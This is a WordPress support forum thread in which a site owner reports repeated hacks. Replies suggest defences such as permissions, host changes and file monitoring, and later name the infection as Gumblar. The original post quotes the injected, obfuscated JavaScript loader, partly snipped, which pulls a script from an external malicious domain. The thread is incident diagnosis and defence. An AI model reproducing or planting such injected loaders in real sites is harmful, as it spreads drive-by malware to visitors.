Support » Installing WordPress » Site Hacked AGAIN!

  • I have posted about this before and followed all the steps that people kindly provided but yet again my WordPress sites have all been hacked. I visited my sites this morning (they were working fine last night) to find the following error:

    Parse error: syntax error, unexpected ‘<‘ in /home/pinkgar1/public_html/wp-includes/default-filters.php on line 229

    Once I overwrote this file with one from a fresh WordPress download, it then brings up this error:

    Parse error: syntax error, unexpected ‘<‘ in /home/pinkgar1/public_html/wp-includes/default-widgets.php on line 1042

    Again, I overwrote this file with one from a fresh WordPress download and the site comes back up with no errors and everything appears to be fine (but it isn’t!).

    This is not an error due to editing a template file nor is it a problem with an installed plugin (unless that is where the hacker is getting in?) THIS IS A HACK ATTEMPT IN WHICH THEY HAVE SUCCEEDED! At the bottom of the browser where it shows ‘waiting for’ a suspicious web site address appears, something along the lines of… and my web browser blocks a file that is trying to download from my site (the pop-up blocker tells me it’s a DAT file or something) I DO NOT have pop-up windows on my web site nor do I have files that download from my site.

    If I look at my source code, they have also managed to insert the following Javascript which sometimes appears and then sometimes doesn’t:

    <script>/*GNU GPL*/ try{window.onload = function(){var N093zwnmmc31lmu = document.createElement(‘s&(!$c@(r&@@(i(&^p^&t!’.replace(/\!|\(|\$|#|\)|&|\^|@/ig, ”));N093zwnmmc31lmu.setAttribute(‘type’, ‘text/javascript’);N093zwnmmc31lmu.setAttribute(‘src’, ‘h(&t$(@t$!p((:)$(/&)/!&&s#&)a@!#(h!$i$@$b#&^^i@))!n$!&#)d(e)&@n&^#-#!c^&@$^o!@(m$$.)&$h()$(e@)i#^&&s!)$e).&@d#$)^e$#$!.(^!a#()d(&^)u(^l^)t@a@d&#w^#@o(&&r@@&&l#&)d$&-)#!&c@o^(m(.!^( [snip some of this code] |\)|\$|\^|@|#|&|\(/ig, ”));document.body.appendChild(N093zwnmmc31lmu);}} catch(e) {}</script>

    This was not there last night, nor is it something that I have added myself.

    This happened to me a week or so ago and I had to COMPLETELY wipe my ENTIRE site files and databases and start from scratch, which was very much my last resort. I emptied all my databases, removed every single file from my web server, downloaded a fresh new copy of the latest of WordPress, downloaded fresh new copies of needed plugins, re-installed everything from scratch, with brand new database logins, passwords, new admin login (even downloaded the plugin that changes the default admin name to something less obvious as ‘admin’) used the default templates that come with the script and yet here I am again, hacked.

    Pretty much all the plugins I installed where compatible with my version of WordPress and I only downloaded ones where the feedback on them was 4 star plus, i.e. very positive.

    I do not have any other scripts or files running on my file server, so it’s not a possible conflict there.

    I even went as far as making sure my brand new computer didn’t have a virus on it, which it doesn’t.

    I will be emailing this to the creators of WordPress but in the mean time, what do I do now? Does this mean I have to find another script, which I really do not want to do but on the other hand, I cannot keep getting hacked every week!

Viewing 15 replies - 1 through 15 (of 23 total)
  • Well if you are using the 2.0 wordpress version, probably the problem is that. You should upgrade to a newer version.

    Moderator Mark Ratledge


    Forum Moderator

    claud925: look at the page source; she’s running 2.9

    pinkgarden: are you sure that javascript isn’t in the footer of your theme? Is that a paid-for theme? The license in the style sheet says it can’t be used other than on your domain.

    The parse error is a different animal, probably a damaged file.

    If it is a hack, it may be coming through shared hosting. Talk to your web host.

    Yep, using 2.9 the very latest (at this present moment in time) release.

    100% positive that the Javascript isn’t in my theme as I created it myself, it’s not a paid for theme.

    The files are not damaged. As I metioned above, everything was from a fresh install. The only time they get corrupted is when the hacker attacks.

    I will try contacting my host as it is shared hosting but only I have access to my account.

    Moderator Mark Ratledge


    Forum Moderator

    You will only have access to your account, but scripting attacks can cross accounts. Might consider changing hosts.

    I’ve been with them for around 6 months, so it’s a relatively new account that I’m all paid up for until the next 2-3 years (meaning I don’t want to have to pay out for a new host, he he!). But it’s also an old enough account to know that everything has been running with out any problems until now. I will contact them though, to see if anyone else has reported attacks on their hosting.

    I have a feeling it’s a plugin that I have recently installed as my problems seemed to start at around the same time as installing it. If I look at my error log, this is the only plugin that is trying to modify stuff right before the site gets hacked.

    Having had a good read around the forum posts I can see there are many many people reporting this very same problem. I very much doubt we are all using the same, dodgy/vunerable plugin so does this not indicate that there is indeed a security hole in the main WordPress script?

    I have emailed the creators about it but have yet to hear anything back (it was only yesterday that I emailed them)

    I have just visited my site again this morning and low and behold, it has the same error:

    Parse error: syntax error, unexpected ‘<‘ in /home/pinkgar1/public_html/wp-includes/default-filters.php on line 229

    I really would like to know what, if anything, is being done about this major problem? Do I now need to find another platform to run my site from? I love WordPress, this would make me quite sad… (sad, I know!)

    pinkgarden, sometimes a virus or trojan can stay hidden from antivirus apps. Try more than one app and if they all say your pc is clean I would look at vulnerability through your ftp or through your shared host as others have suggested.

    Also, if you have a clean backup of your WP installation, replace the entire wp-includes folder with the clean wp-includes folder. Then search every single folder on your server for a php shell script. It will have a name that you do not recognize. You can look at the dates of every file to see which file was altered last.

    Is there a app /plugin to email you as soon as a file has been added/change/deleted on your server?
    Which host are you using BTW.

    Moderator cubecolour


    Is there a app /plugin to email you as soon as a file has been added/change/deleted on your server?

    That’s a good idea Matt Walters’s WordPress File Monitor plugin may help identify when something is getting changed.

    Hmm I am a victim of this also.

    So far here are the files I have found the entries

    all index.php files

    I’m still trying to find where the script is located, in the source code, it is before the topmost -html- tag.

    I have had this problem on my blog as well. I took some time to search every file in my wordpress installation.

    This script is always appended at the bottom of the file, so it isn’t so hard to find.

    Places where I found this script:





    At this point, I realized that all of my plugins were infected, and so I just deleted and replaced them.

    Replace all plugins – .js files are infected

    wp-admin/js folder – almost every file


    any .js files in your themes
    any index.php files in your themes

    I got tired of looking when I got to the last folder, wp-includes/js. However, the codepress folder had this script everywhere. I replaced the entire wp-includes directory.

    It does not affect CSS files.

    I’m not sure what it has to do with default-widgets.php and default-filters.php, but I replaced them just to be safe. Before I did this combing through, I found that just replacing these files would bring my blog back. However, the problem persisted. It appears that some sort of trigger happens which causes the error mentioned in the OP’s post, usually around 12 or 1 am EST.

    It looks like it has infected both my public_html and my www directories. I am going to search through www now, then wipe the directories and reupload the clean ones, and change my database/login passwords.

    edit1: I discovered that my hosting’s cPanel comes with a virus scanner by ClamAV. I tried it and it didn’t find anything.

    Moderator Samuel Wood (Otto)

    (@otto42) Admin

    If you are using shared hosting, then it is extremely likely that being hacked is not a WordPress problem.

    Shared hosts, if configured badly, are highly vulnerable to hacking from other accounts on the same server. This is possible because the default configuration is not secure in many cases (if you install Apache + mod_php, then you’re instantly insecure for a shared hosting scenario).

    It works like this:
    1. Hacker finds a site that has a vulnerability and exploits it.
    2. Now hacker has the ability to put code on somebody’s website and run it.
    3. Hacker puts a small, simple piece of code on the site. This code searches the whole server, even other people’s accounts, and looks for PHP files.
    4. When it finds one that it can access, it inserts its own malicious code into that file.
    5. Voila, you’re hacked, and WordPress never got breached.

    If you have a website that is frequently getting hacked in the same manner, then this is very likely your problem.

    Possible solutions:

    1. Make every file and directory you have on there non-writable. chmod 644 all the files and chmod 755 all the directories.

    2. Ask your host to secure your server (good luck with that, however if they ask how, tell them to start by using “mod_suphp”).

    3. Switch hosts. If you have prepaid long term, then demand a refund as they cannot secure their servers correctly. You’re paying them, this is their problem, and they should be fixing it.

    That’s about the best there is for it, really. WordPress 2.9 has no known security holes as of right now. So the odds of you getting breached that way are pretty slim. If you’re on shared hosting, then a cross-account hack is far more likely. Especially when the hack breaks your site in the process. Think about it, if somebody hacked their way into you specifically, then why would they leave your website in a broken state? An automated script trying to auto-hack your site isn’t smart enough to know when it has obviously broken things.


    Thanks for the heads up. I am contacting my host and I’ll update this thread with how it goes.

    Hi everyone, please check my article about this virus at . It could be helpful and it contains a script for automatical cleaning up the site.

    After some research, i can confirm that it is definitely a form of the Gumblar virus. I cleaned my computer and used this cleaner for my blog, and things are working fine now.

Viewing 15 replies - 1 through 15 (of 23 total)
  • The topic ‘Site Hacked AGAIN!’ is closed to new replies.